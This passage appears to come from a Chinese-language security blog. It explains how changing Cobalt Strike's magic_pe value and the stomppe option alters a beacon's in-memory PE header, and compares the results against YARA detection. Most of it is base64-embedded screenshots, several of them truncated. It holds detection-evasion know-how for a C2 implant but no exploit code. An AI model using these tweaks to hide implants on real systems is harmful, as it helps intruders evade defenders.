<pre tabindex=0><code>set magic_pe "AR"; # 随机的两个值
</code></pre><p>修改完成后在内存中的效果</p>
<p><img loading=lazy src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABBUAAAI7CAIAAAA8lTQsAAAgAElEQVR4nOy9eXxTVf7//7qA8/n+xh2VpUCBklQtAREUJJFVQJO6VNTgSh3UxA0TxkHR6Yzg4IpLIurYOuMMuBIRK9oE2VqWRnBBlFCxCVuBAqLoR7/z/Xw+8xHu74+75Ca5y8naUt7PRx/QnHve57zP+5zbnHPeZ+F4ngdBEARBEARBEAQDndpaAYIgCIIgCIIgjhm6CP9t/Wpj2+pBEARBEARBEEQ75F7vrPr6evljF/m3geeNaAt9CIIgCIIgCIJop8yZMycppIvyA3khCIIgCIIgCILQgfY/EARBEARBEATBCo0fCIIgCIIgCIJgpYtq6PBrF+Y7Y44DwKWEKAI55WMuJUQ1CUUyqikl/G+QgaROolqK/5L0VVMIXLLS2Reck8L0E1VNBikmSM4yqTTIsOBqpuASPzOYgksqUnKIaqLsBU8NRpamSK0b9XaVWPDUhFIbcbIpkptVlqZQ1T2lhgy1022mqfWXpilU02BoV2qqaLQGLQF2Uxi3Ac3mw6n+qviUpFByudlNkaqutu5JIeq1qJpwwj/x/1WaD9RMAc2Cp4YYmSK1gSZrkfJ32vgVU3+3dd+zdE2Rqm9S3SQrzfCKGTZiQ1OwtQG9V0ylPlIV1YyaoSmM2oDK22P4ihm+MdmbIp2Cp9mu1FsaWEyhZvEMCs7QrrLp0aXWceJDpF1wlTbR0Rn8m21aj8j/QBAEQRAEQRAEK+r+B4IgCIIgCIIglNxw4ak5SWfcuHHK41CzTMr1dC1yqpuQoA5644dRQ7taB5+UjQZP/WMXOC7JSUUQBEEQBEEQxyLZn1a6uHZZzpPKU4Ja6I0fxgw9pfyq6wCePde/LvzwrqlXyL88+fe/cJ3+I3VNGUEQBEEQBEEQxyJ644f/+TfOLenJ8/rjB45XDDD8j7iEX16Y7f4VnXH0f3iuC8fRLoscYb95zyNlK+f88XdMg8PC0/2BBe7b+2ybNf7d99talawYd9WXM8xrn3/GmxvXYgacebfvxluKYnOcodxUte2ydfeUrH/55Ycbc5IccRxyynX3jb3irP2v/PnzT9paFYIgCKJt0e/Z87+i8xGui+5P56NcF/lHDv8VnTXS7PXE8pf+VX1B7ovS4bHfvOeRMqxd1F4HDwAOPl25ZDXOeXLBuIFtrUrmjLvqyxlmbPyo7QYPAL5/2fvxOpge8V1Umn1itsvW3VOCz5c/RIOHDsIpN/zhmnem9i5spj+/+8IXX6DnndPPKS5sxgRBEER7w3j/9Po1n3XqfGJq+NGj/xo/9gIAX27+Sg4cPMgC4JLfL1r13JQjXErik13/euo8ANiZucbHJJdP3T873qPesdB/8fz9yuc8ev55sefOYuxY6B/10gGVFPjz/vFIGVoaymd+jU5wPv3Ys6MAYOWcP04ThxODXws7LwEArHq06rYdE+v/OaZ/ajrr3+0/a4uOppY7p39w45mp4asfn+1aDm6SM/rwuSpijUtK/xQBAETufKKs+aGLl/zl0Nl/juhk1F45xzfDjH0bbngsfmbZOVN/99Y1XeWPu99bMPn17+MS/WxLfCMUParY7Mkf1imTHHP5px6T/KllyevXvfWD9OmMe/0339JLevT+W8635JS/feCFAZ/cd+GCmYdHzmvOokSmJ+4pQesX056PKQK73vnMlBt7SvkuXXRL4Mc0k+16x5PX3tATez5aXLk4UXbkhFWueNPbU/fe796TI5x++2OTp/SQHy257X2l7OnT5l4dfxr84Pb3Dytz/N2jV8lP94Y+uKM2QfbW2Vc65afLlro/+CnNEmXGqTc/7Limu/hh34rg9Lqf00zhtBsfnHR1N7SuWu4J/adx9PNHLrqhFwAc0ol0yvW/n3BVN/FDa/2qPyxXanXKlBmXXHmW+GF/w+qZK5RPT77OMz7+dE3DAyvlp/v87xYtvM78l+t/qXxnn7GqBEEQRJtiGXIRgMjmDRlH0MJ4ZVGnzie++dmutzbteOer7YsisXe//fa92LYlO7/p1OnEQ4e+P/Lrv9PIbUnNiQ9+ZRytY3H9c0/tnz0QLasvu+DByxZ8B6Bk6oTrE+Ocd+8Nd+rO6TnnTZkArPzH8q85AAg88EJ1CwBMGD9YjHGZRR48TFsGy4Sy/gBa1lxu+1M/258uf/MQALSsuUJ38AAg8sr8AY81AUDL2qvGzB4wZrZ5zOLVwPiHZ69wd+OXB8yPfwMALeuuHj/HPG6O+Y51OwHYyibLSawIzGoEbFe/MoHFPO2LK6ouHwOsCayXRw/nTJ321jVdsbFu6FXPDruqbi3Q95rKJbdIQ6wxV37uG1G8b+NNVz93wdXPzd4IwDR7vvVsSbz8wRmfekzYt/GWa3y3LDkMoHjySIf4UBo8fBoacd0br7ei+OobA8rB2/rgnM+ACy99+uLMS3Tp7yddDKx/f2M0HiYNHr5YMfrmRW/tR/GVU153dtVOQ4UB115yQ0+V8AnT71jl6o8DX7p/9zf3Rz8B6FM+TGoI0uDhy/qJty1ZdAB9yif/ffLpkujptwmDh80Nl97x/qID6OO46m9Xy1pJg4fNa+3uDwIH0Nt+1asVcVlx8LB5rePOpe8eQO/Lrqy+6rS0SpQBvDx4+Lrxam/wvYPoNdExvzy94y/62S+6uptxtDhffjLlbf2+uzR42PrpjQ+tXHoIReMueWbSKfJTcfDQ9NlND69eegg9x46fN1F+erJTGDw0fX5L1eqlh9BzzNinJ5wST3vLZ680AWVDPYPS0ZkgCIIwwjLkIsafDFJOK5wFvfFDp07ixoaTT+xy8kldTj7phJNO7HLyiSecdOIJJ/32BOERBwwaNHDwIMsgy0DB+QDgxJ7/ylihjsY5l04fjR0LfD0nf/wV8NX8Z4sufLDowtffUUThz770panY0aKdSOmke0YDLQ3PB1Me9e0ufI87x5XJYRy6Xzn6LLSsufyGlREAGDTjprMArFqwMgOPAI+I+7FvAPS3WVT6DLHVk57YBpwzaWI8bMnabQDGjbGkn1ubUjLqthHAvg2vpK5c6n3mOQCwbcbzUQB9LzrnHB4ALreaALRs+PZbAEDdk8G1AHqZJ/UDAPSz/m4EWpa8Pvy+T74Fvn1z4fBrfCOu+UisxtEX3dILQGzO080cfnhxcQxA8dXD7Ypsl32yHcCokZkuYuo7YuoFQOsXrylXLtkuvLEngB2PPR8DDle/vwNA8ZUXTGJPtvjCP1+BPftTwvtccPNQ7Plo8SUPfb4d2P7e4gnT/jZh2sqVwtOLhk3pAWDXUy/uAH7824e7APRxDL1EfHq+8PTpl3YAP7720W4AfRxDxKcjhkzpAWD3vJd3AD/+I7gbQG/7kPHC0+FDnD0AtDzzyk7gx38GWwD0vkx6mj+GDbqmO4A9vr+3AP/5xvI9AHpNtIxhT6GnZcYEtH6XU62GnHtVNwD7Xnx9L/DzO6tbARSNO9cmPD3v3CvPAtD68hv7gJ8XrW4F0HPsOVbh6eBzhKd/fWsf8Mu79fsB9BxztlWRfHjrfgBDB/YCQRAE0b6RHQupQwU5JAPnAxjvj/vtb7uc+NsuJ/62M9eZ/9ev/3X4v/7z+/8nrQ3guS1btn69JbIlsvXrLWLv9Ldn/r8MVOmQXO8eX4LvPl6e2tVSxLljHBa+/eIuzQiDJw4sAbDr4NepB1kVdzsXALqb+8bDeBx87IaqfuLgAZa7xl0CoGWN7+NMiqAH1/3BhY9ERzeVjnv0zhWK8BXf1AOwjnpgQK5zzCfnjCrtC2Dv98rrFrctfG3oVc8OvXt9wh2Me7/fpqiL4musl4u//rBLMTVcPmVEMQ43rP8BajguMgHAp9GQ8HlddC0AmMaNUkRaH1sH4MIL7+6bLM6CeWRJMYDWHxTOB1w6vAQAPt8uNofw9kYAKBlrTRbXYuLV5+PDVW+kNOoJFef3wU+Nn6ovhZpwYT8A+HKnOJzYsPMTAOg3+iIAuGSY8HTXKuHpxl2fAEDfi0cIT/sCwObd0tPdGwCg76gRADB
</p>
<p>使用yara进行检测的前后对比</p>
<p><img loading=lazy src="data:image/png;base64,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
</p>
<p>然而，这种修改方式是有限的，因为我们在每种情况下只能修改几个字节，所以显然更健壮的YARA签名仍然会触发</p>
<p>同时官方还提供了一个Stage.stomppe用于轻微混淆内存中的 beacon dll，但是我在测试发现设置stomppe为true时，PE头中的仅仅在特征处增加了一个IMAGE_FILE_RELOCS_STRIPPED</p>
<p><img loading=lazy src=data:image/png;base64,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
</p>
<p>未设置stomppe时</p>
<p><img loading=lazy src="data:image/png;base64,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